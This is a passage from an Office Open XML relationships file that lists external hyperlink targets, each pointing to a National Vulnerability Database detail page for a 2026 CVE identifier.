Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 